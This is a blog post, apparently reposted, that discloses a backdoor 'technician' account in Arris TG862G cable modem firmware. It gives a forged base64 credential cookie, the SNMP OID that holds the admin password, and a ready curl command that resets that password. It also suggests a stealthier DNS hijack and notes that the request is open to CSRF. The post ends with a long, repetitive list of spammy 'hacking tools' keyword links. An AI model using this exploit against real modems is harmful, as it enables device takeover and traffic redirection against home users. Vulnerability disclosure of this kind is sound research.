Friday, 28 August 2020

Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -
Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.
Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):
Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9
 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:
{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
And after base64 decoding the "credential" value we get:
{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:
Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9
Which decodes to the following:
{"credential":"dGVjaG5pY2lhbjo="}
And finally:
{"credential":"technician:"} 
Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(




That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:


That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:


Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:
SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);
Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:
HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}
What about setting a new value? Surely that will not work....



That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:


This functionality can be wrapped up in the following curl command:
curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'
Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.


More information


  1. Pentest Tools Find Subdomains
  2. Hacker Tools Linux
  3. Hacking Apps
  4. Nsa Hack Tools
  5. Pentest Tools Nmap
  6. Ethical Hacker Tools
  7. Pentest Reporting Tools
  8. Hacking Tools Download
  9. Hacker Techniques Tools And Incident Handling
  10. Pentest Tools For Mac
  11. Hacker Tool Kit
  12. Wifi Hacker Tools For Windows
  13. New Hacker Tools
  14. Hacking Tools 2019
  15. Hack Tools For Games
  16. Pentest Automation Tools
  17. Hacker Hardware Tools
  18. Pentest Tools Android
  19. Install Pentest Tools Ubuntu
  20. Hacker Tools Hardware
  21. Hack Tools For Mac
  22. World No 1 Hacker Software
  23. Physical Pentest Tools
  24. Hacker Tools Software
  25. Hacking Tools
  26. Pentest Tools Find Subdomains
  27. Hack And Tools
  28. Hack Tools Pc
  29. Hack Tool Apk No Root
  30. Hacking Tools For Games
  31. Beginner Hacker Tools
  32. Hacker Tools For Mac
  33. Hacking Tools Name
  34. Hacking Tools Usb
  35. Pentest Tools Website Vulnerability
  36. Hacker Tools List
  37. Hacker Tools Free Download
  38. Hacking Tools Kit
  39. Hacker Tools
  40. Hacking Tools For Games
  41. Hacker Tools Software
  42. Tools For Hacker
  43. Usb Pentest Tools
  44. Pentest Tools For Android
  45. Hack Apps
  46. Pentest Tools Alternative
  47. Growth Hacker Tools
  48. Pentest Tools Website Vulnerability
  49. Hacking Tools Hardware
  50. Hacking Tools Usb
  51. What Are Hacking Tools
  52. New Hack Tools
  53. Free Pentest Tools For Windows
  54. Hacking Tools For Windows
  55. Hacking Tools Usb
  56. Pentest Automation Tools
  57. Hacker
  58. Hacking Tools Hardware
  59. Top Pentest Tools
  60. Hacker
  61. What Is Hacking Tools
  62. Pentest Tools Download
  63. Nsa Hacker Tools
  64. Install Pentest Tools Ubuntu
  65. Hacker Security Tools
  66. Pentest Tools Windows
  67. Hacking Tools Online
  68. Pentest Tools List
  69. Hacking Tools Windows
  70. Hack App
  71. Pentest Tools Website
  72. Hacker Tools Windows
  73. Hack Tools Pc
  74. Hackrf Tools
  75. Hacker Tools Software
  76. Pentest Tools Download
  77. Pentest Tools Framework
  78. Pentest Tools Website Vulnerability
  79. Hacking Tools Usb
  80. Pentest Tools For Android
  81. Best Pentesting Tools 2018
  82. Pentest Tools Free
  83. Hacker Search Tools
  84. Hacking Tools 2019
  85. Pentest Box Tools Download
  86. Install Pentest Tools Ubuntu
  87. New Hack Tools
  88. Hacks And Tools
  89. Bluetooth Hacking Tools Kali
  90. Black Hat Hacker Tools
  91. Hacking Tools For Pc
  92. Pentest Tools Subdomain
  93. Hacking Tools For Games
  94. Hack Apps
  95. Ethical Hacker Tools
  96. Tools 4 Hack
  97. Hacking Tools Windows 10
  98. Hacker Tools Apk Download
  99. Hacker Tools Hardware
  100. Hacker Tools 2020
  101. Hacking Tools For Windows Free Download
  102. Hacking Tools Download

No comments:

Post a Comment